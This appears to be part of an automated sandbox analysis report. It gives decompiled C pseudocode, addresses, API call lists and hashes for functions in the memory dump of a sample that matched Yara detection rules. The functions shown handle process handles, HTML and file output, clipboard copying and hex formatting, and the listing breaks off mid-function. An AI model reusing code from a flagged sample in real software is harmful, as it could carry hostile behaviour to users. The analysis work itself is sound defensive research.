                                                                                              0x0040e2d9
                                                                                              0x0040e2ca
                                                                                              0x0040e44e
                                                                                              0x0040e451
                                                                                              0x0040e451
                                                                                              0x0040e297
                                                                                              0x0040e45e

                                                                                              APIs
                                                                                              • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,0040DD5F,00000000,00000000), ref: 0040E28C
                                                                                              • memset.MSVCRT ref: 0040E2E9
                                                                                              • memset.MSVCRT ref: 0040E2FB
                                                                                                • Part of subcall function 0040E172: strcpy.MSVCRT(?,-00000001), ref: 0040E198
                                                                                              • memset.MSVCRT ref: 0040E3E2
                                                                                              • strcpy.MSVCRT(?,?,?,00000000,00000118), ref: 0040E407
                                                                                              • CloseHandle.KERNEL32(00000000,0040DD5F,?), ref: 0040E451
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: memset$strcpy$CloseHandleOpenProcess
                                                                                              • String ID:
                                                                                              • API String ID: 3799309942-0
                                                                                              • Opcode ID: 090a920ccff3a4e303efb007cbafe5d1b02941aedbce4837af1c52a6e7a2511d
                                                                                              • Instruction ID: 14fca006082a3f7ea55a807dd49808cd12c96cdbdfea8439eb00a9ee5a281ce1
                                                                                              • Opcode Fuzzy Hash: 090a920ccff3a4e303efb007cbafe5d1b02941aedbce4837af1c52a6e7a2511d
                                                                                              • Instruction Fuzzy Hash: A2512DB1900218ABDB10DF95DC85ADEBBB8FF44304F1045AAF609B6291D7749F90CF69
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00409369, Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 106stringCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 61%
                                                                                              			E00409369(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				char* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				char _v48;
				char _v68;
				void _v96;
				void* __edi;
				signed int _t51;
				char* _t53;
				char* _t63;
				intOrPtr* _t69;
				signed int _t70;
				char _t84;
				intOrPtr* _t91;
				signed int _t95;
				void* _t96;
				void* _t97;

				_t69 = __ebx;
				_t70 = 6;
				memcpy( &_v96, "<td bgcolor=#%s nowrap>%s", _t70 << 2);
				_t97 = _t96 + 0xc;
				asm("movsw");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsw");
				asm("movsb");
				E00405EFD(_a4, "<tr>");
				_t95 = 0;
				if( *((intOrPtr*)(__ebx + 0x20)) > 0) {
					do {
						_t51 =  *( *((intOrPtr*)(_t69 + 0x24)) + _t95 * 4);
						_v8 = _t51;
						_t53 =  &_v96;
						if( *((intOrPtr*)((_t51 << 4) +  *((intOrPtr*)(_t69 + 0x34)) + 4)) == 0) {
							_t53 =  &_v48;
						}
						_t91 = _a8;
						_v28 = _v28 | 0xffffffff;
						_v24 = _v24 | 0xffffffff;
						_v20 = _v20 | 0xffffffff;
						_v16 = _v16 & 0x00000000;
						_v12 = _t53;
						 *((intOrPtr*)( *_t69 + 0x30))(4, _t95, _t91,  &_v28);
						E0040F071(_v28,  &_v68);
						E0040F09D( *((intOrPtr*)( *_t91))(_v8,  *(_t69 + 0x4c)),  *(_t69 + 0x50));
						 *((intOrPtr*)( *_t69 + 0x48))( *(_t69 + 0x50), _t91, _v8);
						_t63 =  *(_t69 + 0x50);
						_t84 =  *_t63;
						if(_t84 == 0 || _t84 == 0x20) {
							strcat(_t63, "&nbsp;");
						}
						E0040F126( &_v28,  *((intOrPtr*)(_t69 + 0x54)),  *(_t69 + 0x50));
						sprintf( *(_t69 + 0x4c), _v12,  &_v68,  *((intOrPtr*)(_t69 + 0x54)));
						E00405EFD(_a4,  *(_t69 + 0x4c));
						_t97 = _t97 + 0x20;
						_t95 = _t95 + 1;
					} while (_t95 <  *((intOrPtr*)(_t69 + 0x20)));
				}
				return E00405EFD(_a4, 0x412b1c);
			}























                                                                                              0x00409369
                                                                                              0x00409373
                                                                                              0x0040937c
                                                                                              0x0040937c
                                                                                              0x0040937e
                                                                                              0x00409388
                                                                                              0x00409389
                                                                                              0x0040938a
                                                                                              0x0040938b
                                                                                              0x0040938c
                                                                                              0x00409396
                                                                                              0x00409397
                                                                                              0x0040939c
                                                                                              0x004093a3
                                                                                              0x004093a9
                                                                                              0x004093ac
                                                                                              0x004093b2
                                                                                              0x004093bd
                                                                                              0x004093c0
                                                                                              0x004093c2
                                                                                              0x004093c2
                                                                                              0x004093c5
                                                                                              0x004093c8
                                                                                              0x004093cc
                                                                                              0x004093d0
                                                                                              0x004093d4
                                                                                              0x004093de
                                                                                              0x004093e7
                                                                                              0x004093f1
                                                                                              0x00409407
                                                                                              0x00409417
                                                                                              0x0040941a
                                                                                              0x0040941d
                                                                                              0x00409421
                                                                                              0x0040942e
                                                                                              0x00409434
                                                                                              0x0040943e
                                                                                              0x00409450
                                                                                              0x0040945b
                                                                                              0x00409460
                                                                                              0x00409463
                                                                                              0x00409464
                                                                                              0x004093a9
                                                                                              0x0040947f

                                                                                              APIs
                                                                                                • Part of subcall function 00405EFD: strlen.MSVCRT ref: 00405F0A
                                                                                                • Part of subcall function 00405EFD: WriteFile.KERNEL32(00412B1C,00000001,00000000,75144DE0,00000000,?,?,004092ED,00000001,00412B1C,75144DE0), ref: 00405F17
                                                                                              • strcat.MSVCRT(?,&nbsp;), ref: 0040942E
                                                                                              • sprintf.MSVCRT ref: 00409450
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: FileWritesprintfstrcatstrlen
                                                                                              • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                              • API String ID: 3813295786-4153097237
                                                                                              • Opcode ID: de7b970c7ee51d784ccd368963446ea6545f22e24ac9db830538cbfa5b1be59e
                                                                                              • Instruction ID: 5cc8281df9b45005db58bfc05dfa6f470ea1610febbae0d5d066e94f32a410cd
                                                                                              • Opcode Fuzzy Hash: de7b970c7ee51d784ccd368963446ea6545f22e24ac9db830538cbfa5b1be59e
                                                                                              • Instruction Fuzzy Hash: 0C316B31900208AFCF15DF94C8869DE7BB6FF44310F1041AAFD11AB2E2D776AA55DB84
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00410A8A, Relevance: 9.1, APIs: 6, Instructions: 96stringCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 73%
                                                                                              			E00410A8A(void* __ecx, void* __eflags, intOrPtr* _a4, int _a8) {
				void* _v8;
				intOrPtr* _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v288;
				intOrPtr _v800;
				char _v1568;
				char _v1824;
				intOrPtr _v1828;
				intOrPtr _v1840;
				intOrPtr _v1844;
				intOrPtr _v2100;
				intOrPtr _v2612;
				char _v3124;
				char _v3636;
				intOrPtr _v3640;
				void* _v5768;
				char _v5796;
				void* __ebx;
				void* __edi;
				void* __esi;
				char* _t39;
				intOrPtr _t51;
				int _t60;
				intOrPtr* _t73;
				int _t76;
				void* _t80;

				_t80 = __eflags;
				E004118A0(0x16a0, __ecx);
				_t39 = wcslen(_a8);
				_t2 =  &(_t39[1]); // 0x1
				_t76 = _t2;
				_push(_t76);
				L004115D0();
				_t60 = 0;
				_v8 = _t39;
				 *_t39 = 0;
				WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t39, _t76, 0, 0);
				_t77 =  &_v5796;
				E0040FE05( &_v5796, _t80);
				_v5796 = 0x4144ac;
				E004104BC( &_v3636);
				E004104BC( &_v1824);
				_t73 = _a4;
				_v3640 =  *((intOrPtr*)(_t73 + 4));
				_v12 = _t73;
				_a8 = strlen(_v8);
				E0040FF76(_t47, _t77);
				memcpy(_v5768, _v8, _a8);
				E00410081(_t77, _t80);
				_t51 =  *((intOrPtr*)(_t73 + 4));
				_v1840 = _t51;
				_v28 = _t51;
				if(_v2100 != 0 || _v2612 != 0) {
					if(_v1844 != _t60) {
						if(_v1568 != _t60) {
							E004060D0(0xff,  &_v3124,  &_v1568);
							_t73 = _a4;
							_v1828 = _v24;
							_t60 = 0;
						}
						 *((intOrPtr*)( *_t73))( &_v3636);
					}
				}
				if(_v288 != _t60 || _v800 != _t60) {
					if(_v32 != _t60) {
						 *((intOrPtr*)( *_t73))( &_v1824);
					}
				}
				_push(_v8);
				L004115D6();
				return E0040FEED( &_v5796);
			}































                                                                                              0x00410a8a
                                                                                              0x00410a92
                                                                                              0x00410a9d
                                                                                              0x00410aa2
                                                                                              0x00410aa2
                                                                                              0x00410aa5
                                                                                              0x00410aa6
                                                                                              0x00410aad
                                                                                              0x00410ab8
                                                                                              0x00410abd
                                                                                              0x00410abf
                                                                                              0x00410ac5
                                                                                              0x00410acb
                                                                                              0x00410ad6
                                                                                              0x00410ae0
                                                                                              0x00410aeb
                                                                                              0x00410af0
                                                                                              0x00410af9
                                                                                              0x00410aff
                                                                                              0x00410b08
                                                                                              0x00410b0b
                                                                                              0x00410b1c
                                                                                              0x00410b26
                                                                                              0x00410b31
                                                                                              0x00410b34
                                                                                              0x00410b3a
                                                                                              0x00410b3d
                                                                                              0x00410b4d
                                                                                              0x00410b55
                                                                                              0x00410b69
                                                                                              0x00410b71
                                                                                              0x00410b75
                                                                                              0x00410b7b
                                                                                              0x00410b7b
                                                                                              0x00410b88
                                                                                              0x00410b88
                                                                                              0x00410b4d
                                                                                              0x00410b90
                                                                                              0x00410b9d
                                                                                              0x00410baa
                                                                                              0x00410baa
                                                                                              0x00410b9d
                                                                                              0x00410bac
                                                                                              0x00410baf
                                                                                              0x00410bc4

                                                                                              APIs
                                                                                              • wcslen.MSVCRT ref: 00410A9D
                                                                                              • ??2@YAPAXI@Z.MSVCRT ref: 00410AA6
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00410C2C,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,00410C2C,?,00000000), ref: 00410ABF
                                                                                                • Part of subcall function 0040FE05: ??2@YAPAXI@Z.MSVCRT ref: 0040FE1A
                                                                                                • Part of subcall function 0040FE05: ??2@YAPAXI@Z.MSVCRT ref: 0040FE38
                                                                                                • Part of subcall function 0040FE05: ??2@YAPAXI@Z.MSVCRT ref: 0040FE53
                                                                                                • Part of subcall function 0040FE05: ??2@YAPAXI@Z.MSVCRT ref: 0040FE7C
                                                                                                • Part of subcall function 0040FE05: ??2@YAPAXI@Z.MSVCRT ref: 0040FEA0
                                                                                              • strlen.MSVCRT ref: 00410B02
                                                                                                • Part of subcall function 0040FF76: ??3@YAXPAX@Z.MSVCRT ref: 0040FF81
                                                                                                • Part of subcall function 0040FF76: ??2@YAPAXI@Z.MSVCRT ref: 0040FF90
                                                                                              • memcpy.MSVCRT ref: 00410B1C
                                                                                              • ??3@YAXPAX@Z.MSVCRT ref: 00410BAF
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                                                              • String ID:
                                                                                              • API String ID: 577244452-0
                                                                                              • Opcode ID: eda384fdfc038d1513b3794fcc6cadf0bacc3feb473f8e14eb1b45133d0eb622
                                                                                              • Instruction ID: 5b66efc9566b80317fa540751e9ebc59d69584110078b55da7be64cca713082c
                                                                                              • Opcode Fuzzy Hash: eda384fdfc038d1513b3794fcc6cadf0bacc3feb473f8e14eb1b45133d0eb622
                                                                                              • Instruction Fuzzy Hash: 44317672804219AFCF21EFA1C8809EDBBB5AF44314F1440AAE508A3251DB796FC4CF98
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040AB54, Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 72COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E0040AB54(void* __edi, intOrPtr _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char* _v36;
				intOrPtr _v40;
				char* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				char _v72;
				void _v1095;
				char _v1096;
				void* __ebx;
				char _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				void* _t39;
				void* _t52;
				char _t59;
				char* _t60;
				intOrPtr _t61;

				_v1096 = 0;
				memset( &_v1095, 0, 0x3ff);
				_v8 = 0x747874;
				_t29 = E004078FF(0x1f5);
				_t59 = "*.txt";
				_v72 = _t29;
				_v68 = _t59;
				_v64 = E004078FF(0x1f6);
				_v60 = _t59;
				_v56 = E004078FF(0x1f7);
				_v52 = _t59;
				_t32 = E004078FF(0x1f8);
				_t60 = "*.htm;*.html";
				_v48 = _t32;
				_v44 = _t60;
				_v40 = E004078FF(0x1f9);
				_v36 = _t60;
				_v32 = E004078FF(0x1fa);
				_v28 = "*.xml";
				_t35 = E004078FF(0x1fb);
				_t61 = "*.csv";
				_v24 = _t35;
				_v20 = _t61;
				_v16 = E004078FF(0x1fc);
				_v12 = _t61;
				E0040684D( &_v1096,  &_v72, 8);
				_t52 = 7;
				_t39 = E004078FF(_t52);
				_t23 =  &_v8; // 0x747874
				return E00406680(_a8,  *((intOrPtr*)(_a4 + 0x108)), __edi,  &_v1096, _t39, _t23);
			}































                                                                                              0x0040ab6d
                                                                                              0x0040ab74
                                                                                              0x0040ab81
                                                                                              0x0040ab88
                                                                                              0x0040ab8d
                                                                                              0x0040ab93
                                                                                              0x0040ab96
                                                                                              0x0040aba3
                                                                                              0x0040aba6
                                                                                              0x0040abaf
                                                                                              0x0040abb2
                                                                                              0x0040abb5
                                                                                              0x0040abba
                                                                                              0x0040abc4
                                                                                              0x0040abc7
                                                                                              0x0040abd0
                                                                                              0x0040abd3
                                                                                              0x0040abe0
                                                                                              0x0040abe3
                                                                                              0x0040abea
                                                                                              0x0040abef
                                                                                              0x0040abf5
                                                                                              0x0040abf8
                                                                                              0x0040ac00
                                                                                              0x0040ac0f
                                                                                              0x0040ac12
                                                                                              0x0040ac1b
                                                                                              0x0040ac1c
                                                                                              0x0040ac24
                                                                                              0x0040ac44

                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0040AB74
                                                                                                • Part of subcall function 004078FF: LoadStringA.USER32 ref: 004079C8
                                                                                                • Part of subcall function 004078FF: memcpy.MSVCRT ref: 00407A07
                                                                                                • Part of subcall function 004078FF: strcpy.MSVCRT(004172C0,strings,?,?,00408822,?,?,?,?,?,00000000,75144DE0), ref: 0040797A
                                                                                                • Part of subcall function 004078FF: strlen.MSVCRT ref: 00407998
                                                                                                • Part of subcall function 0040684D: memset.MSVCRT ref: 0040686D
                                                                                                • Part of subcall function 0040684D: sprintf.MSVCRT ref: 0040689A
                                                                                                • Part of subcall function 0040684D: strlen.MSVCRT ref: 004068A6
                                                                                                • Part of subcall function 0040684D: memcpy.MSVCRT ref: 004068BB
                                                                                                • Part of subcall function 0040684D: strlen.MSVCRT ref: 004068C9
                                                                                                • Part of subcall function 0040684D: memcpy.MSVCRT ref: 004068D9
                                                                                                • Part of subcall function 00406680: GetSaveFileNameA.COMDLG32(?), ref: 004066CF
                                                                                                • Part of subcall function 00406680: strcpy.MSVCRT(?,?), ref: 004066E6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: memcpystrlen$memsetstrcpy$FileLoadNameSaveStringsprintf
                                                                                              • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                              • API String ID: 4021364944-3614832568
                                                                                              • Opcode ID: 47d6f0de7c66cadcf7d9a44beb2654d42ee3cfb16f185572a55cd809b74eca63
                                                                                              • Instruction ID: 4d38638b85bcf07ffefc140bede2392a268d493de89ddae44be4c2da79bd640a
                                                                                              • Opcode Fuzzy Hash: 47d6f0de7c66cadcf7d9a44beb2654d42ee3cfb16f185572a55cd809b74eca63
                                                                                              • Instruction Fuzzy Hash: B62101B2D442589ECB01FF99D8857DDBBB4BB04304F10417BE619B7282D7381A45CB5A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00406491, Relevance: 9.1, APIs: 6, Instructions: 57COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 72%
                                                                                              			E00406491(void* __edx, struct HWND__* _a4) {
				int _v8;
				struct tagRECT _v24;
				int _t17;
				void* _t36;
				struct HDC__* _t38;

				_t36 = __edx;
				_t38 = GetDC(0);
				_t17 = GetDeviceCaps(_t38, 8);
				_v8 = GetDeviceCaps(_t38, 0xa);
				ReleaseDC(0, _t38);
				GetWindowRect(_a4,  &_v24);
				asm("cdq");
				asm("cdq");
				return MoveWindow(_a4, _v24.left - _v24.right + _t17 - 1 - _t36 >> 1, _v24.top - _v24.bottom + _v8 - 1 - _v8 >> 1, _v24.right - _v24.left + 1, _v24.bottom - _v24.top + 1, 1);
			}








                                                                                              0x00406491
                                                                                              0x004064a8
                                                                                              0x004064ad
                                                                                              0x004064b9
                                                                                              0x004064bc
                                                                                              0x004064c9
                                                                                              0x004064e1
                                                                                              0x004064f5
                                                                                              0x00406511

                                                                                              APIs
                                                                                              • GetDC.USER32(00000000), ref: 0040649C
                                                                                              • GetDeviceCaps.GDI32(00000000,00000008), ref: 004064AD
                                                                                              • GetDeviceCaps.GDI32(00000000,0000000A), ref: 004064B4
                                                                                              • ReleaseDC.USER32 ref: 004064BC
                                                                                              • GetWindowRect.USER32 ref: 004064C9
                                                                                              • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00406507
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CapsDeviceWindow$MoveRectRelease
                                                                                              • String ID:
                                                                                              • API String ID: 3197862061-0
                                                                                              • Opcode ID: 69bb305ff33d1457d4484e576323a0ef66f31560397ccb35d966ff8f0e758d9b
                                                                                              • Instruction ID: 542b186de9fc11de55873c3549d90df3c6ab5362d14aa96611489808ae4c73e2
                                                                                              • Opcode Fuzzy Hash: 69bb305ff33d1457d4484e576323a0ef66f31560397ccb35d966ff8f0e758d9b
                                                                                              • Instruction Fuzzy Hash: FC117C31A0011AAFDB009BB9CE4DEEFBFB8EB84711F014165E901E7250D6B0AD01CBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00403A8D, Relevance: 9.1, APIs: 6, Instructions: 56filestringCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 95%
                                                                                              			E00403A8D(void* __ecx, void* __eflags, void* _a4, char* _a8) {
				long _v8;
				void _v8199;
				char _v8200;
				void _v24582;
				short _v24584;

				E004118A0(0x6004, __ecx);
				_v24584 = 0;
				memset( &_v24582, 0, 0x3ffe);
				_v8200 = 0;
				memset( &_v8199, 0, 0x1fff);
				MultiByteToWideChar(0, 0, _a8, 0xffffffff,  &_v24584, 0x1fff);
				WideCharToMultiByte(0xfde9, 0,  &_v24584, 0xffffffff,  &_v8200, 0x1fff, 0, 0);
				return WriteFile(_a4,  &_v8200, strlen( &_v8200),  &_v8, 0);
			}








                                                                                              0x00403a95
                                                                                              0x00403aab
                                                                                              0x00403ab2
                                                                                              0x00403ac5
                                                                                              0x00403acb
                                                                                              0x00403ae2
                                                                                              0x00403b01
                                                                                              0x00403b2d

                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 00403AB2
                                                                                              • memset.MSVCRT ref: 00403ACB
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF), ref: 00403AE2
                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00403B01
                                                                                              • strlen.MSVCRT ref: 00403B13
                                                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403B24
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWidememset$FileWritestrlen
                                                                                              • String ID:
                                                                                              • API String ID: 1786725549-0
                                                                                              • Opcode ID: f625be7e6fa724cc13b0b56902c1b33cd6369ef039f23dbe168f1e8392359ec1
                                                                                              • Instruction ID: d8056d974a042835a8b53dd5956248081512f57f3cb7fafeec888b91cb2496ed
                                                                                              • Opcode Fuzzy Hash: f625be7e6fa724cc13b0b56902c1b33cd6369ef039f23dbe168f1e8392359ec1
                                                                                              • Instruction Fuzzy Hash: 6A1161B244012CBEFB009B94DD85DEB77ADEF08354F0041A6B70AD2091D6349F94CB78
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040AC8A, Relevance: 9.1, APIs: 6, Instructions: 54fileclipboardCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E0040AC8A(void* __eax, void* __ebx) {
				char _v264;
				char _v524;
				void* __edi;
				void* __esi;
				long _t13;
				void* _t18;
				int _t19;
				long _t20;
				void* _t27;
				void* _t31;

				_t27 = __ebx;
				_t31 = __eax;
				_t13 = GetTempPathA(0x104,  &_v524);
				_t32 = _t13;
				if(_t13 == 0) {
					GetWindowsDirectoryA( &_v524, 0x104);
				}
				_v264 = 0;
				GetTempFileNameA( &_v524, "cp", 0,  &_v264);
				_t18 = E0040AC47(_t31, _t32,  &_v264, 2, 1);
				if(_t18 != 0) {
					_t19 = OpenClipboard( *(_t31 + 0x108));
					_t34 = _t19;
					if(_t19 == 0) {
						_t20 = GetLastError();
					} else {
						_t20 = E00405FC6(_t27, 0x104, _t31, _t34,  &_v264);
					}
					if(_t20 != 0) {
						E00405F41(_t20,  *(_t31 + 0x108));
					}
					return DeleteFileA( &_v264);
				}
				return _t18;
			}













                                                                                              0x0040ac8a
                                                                                              0x0040ac95
                                                                                              0x0040aca4
                                                                                              0x0040acaa
                                                                                              0x0040acac
                                                                                              0x0040acb6
                                                                                              0x0040acb6
                                                                                              0x0040acd1
                                                                                              0x0040acd8
                                                                                              0x0040ace9
                                                                                              0x0040acf0
                                                                                              0x0040acf8
                                                                                              0x0040acfe
                                                                                              0x0040ad00
                                                                                              0x0040ad11
                                                                                              0x0040ad02
                                                                                              0x0040ad09
                                                                                              0x0040ad0e
                                                                                              0x0040ad19
                                                                                              0x0040ad21
                                                                                              0x0040ad26
                                                                                              0x00000000
                                                                                              0x0040ad2e
                                                                                              0x0040ad37

                                                                                              APIs
                                                                                              • GetTempPathA.KERNEL32(00000104,?), ref: 0040ACA4
                                                                                              • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040ACB6
                                                                                              • GetTempFileNameA.KERNEL32(?,0041341C,00000000,?), ref: 0040ACD8
                                                                                              • OpenClipboard.USER32(?), ref: 0040ACF8
                                                                                              • GetLastError.KERNEL32 ref: 0040AD11
                                                                                              • DeleteFileA.KERNEL32(00000000), ref: 0040AD2E
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                                                                                              • String ID:
                                                                                              • API String ID: 2014771361-0
                                                                                              • Opcode ID: 04f759ef316dfc5a7bfb4e8c49b84bbeab9ff02a57951bdc03c1b9a7e5f51390
                                                                                              • Instruction ID: 1632bef886f39339d389646b63a05c30f7573d4ca20e624e383ab74febbb07e7
                                                                                              • Opcode Fuzzy Hash: 04f759ef316dfc5a7bfb4e8c49b84bbeab9ff02a57951bdc03c1b9a7e5f51390
                                                                                              • Instruction Fuzzy Hash: E0118272504318ABDB209B60DD49FDB77BC9F14701F0001B6F689E2091DBB8DAD4CB29
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00406585, Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 53stringCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 86%
                                                                                              			E00406585(char* __edi, intOrPtr _a4, signed int _a8) {
				void _v259;
				char _v260;
				char* _t34;
				signed int _t35;
				void* _t36;
				void* _t37;

				_t34 = __edi;
				_v260 = 0;
				memset( &_v259, 0, 0xfe);
				_t37 = _t36 + 0xc;
				 *__edi = 0;
				_t35 = 0;
				do {
					_push( *(_t35 + _a4) & 0x000000ff);
					sprintf( &_v260, "%2.2X");
					_t37 = _t37 + 0xc;
					if(_t35 > 0) {
						strcat(_t34, " ");
					}
					if(_a8 > 0) {
						asm("cdq");
						if(_t35 % _a8 == 0) {
							strcat(_t34, "  ");
						}
					}
					strcat(_t34,  &_v260);
					_t35 = _t35 + 1;
				} while (_t35 < 0x80);
				return _t34;
			}









                                                                                              0x00406585
                                                                                              0x0040659d
                                                                                              0x004065a4
                                                                                              0x004065a9
                                                                                              0x004065ac
                                                                                              0x004065af
                                                                                              0x004065b1
                                                                                              0x004065b8
                                                                                              0x004065c5
                                                                                              0x004065ca
                                                                                              0x004065cf
                                                                                              0x004065d7
                                                                                              0x004065dd
                                                                                              0x004065e2
                                                                                              0x004065e6
                                                                                              0x004065ec
                                                                                              0x004065f4
                                                                                              0x004065fa
                                                                                              0x004065ec
                                                                                              0x00406603
                                                                                              0x00406608
                                                                                              0x00406610
                                                                                              0x00406617

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: strcat$memsetsprintf
                                                                                              • String ID: %2.2X
                                                                                              • API String ID: 582077193-791839006
                                                                                              • Opcode ID: f03ef531f1dceed6107a024529effe878a92871925f9b5c2fb8bf99f2bcc600c
                                                                                              • Instruction ID: 9ba21b13147b7bc42f3eaeb5b708c7057566a78b4f06b3a82068ff28b5e275af
                                                                                              • Opcode Fuzzy Hash: f03ef531f1dceed6107a024529effe878a92871925f9b5c2fb8bf99f2bcc600c
                                                                                              • Instruction Fuzzy Hash: 54014C7294421476D7315725ED03BEA379C9B84704F10407FF986A61C5EABCDBD48798
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040FEED, Relevance: 9.0, APIs: 6, Instructions: 46COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 77%
                                                                                              			E0040FEED(intOrPtr* __edi) {
				void* __esi;
				signed int _t9;
				intOrPtr* _t16;
				intOrPtr _t18;
				intOrPtr _t19;
				intOrPtr _t20;
				intOrPtr _t21;
				intOrPtr _t22;

				_t16 = __edi;
				_t9 =  *(__edi + 0x1c);
				 *__edi = 0x414288;
				if(_t9 != 0) {
					_push(_t9);
					L004115D6();
					 *(__edi + 0x1c) =  *(__edi + 0x1c) & 0x00000000;
				}
				_t18 =  *((intOrPtr*)(_t16 + 0x460));
				if(_t18 != 0) {
					_t9 = E00406B5B(_t18);
					_push(_t18);
					L004115D6();
				}
				_t19 =  *((intOrPtr*)(_t16 + 0x45c));
				if(_t19 != 0) {
					_t9 = E00406B5B(_t19);
					_push(_t19);
					L004115D6();
				}
				_t20 =  *((intOrPtr*)(_t16 + 0x458));
				if(_t20 != 0) {
					_t9 = E00406B5B(_t20);
					_push(_t20);
					L004115D6();
				}
				_t21 =  *((intOrPtr*)(_t16 + 0x454));
				if(_t21 != 0) {
					_t9 = E00406A4E(_t21);
					_push(_t21);
					L004115D6();
				}
				_t22 =  *((intOrPtr*)(_t16 + 0x450));
				if(_t22 != 0) {
					_t9 = E00406A4E(_t22);
					_push(_t22);
					L004115D6();
				}
				return _t9;
			}











                                                                                              0x0040feed
                                                                                              0x0040feed
                                                                                              0x0040fef2
                                                                                              0x0040fef8
                                                                                              0x0040fefa
                                                                                              0x0040fefb
                                                                                              0x0040ff00
                                                                                              0x0040ff04
                                                                                              0x0040ff06
                                                                                              0x0040ff0e
                                                                                              0x0040ff10
                                                                                              0x0040ff15
                                                                                              0x0040ff16
                                                                                              0x0040ff1b
                                                                                              0x0040ff1c
                                                                                              0x0040ff24
                                                                                              0x0040ff26
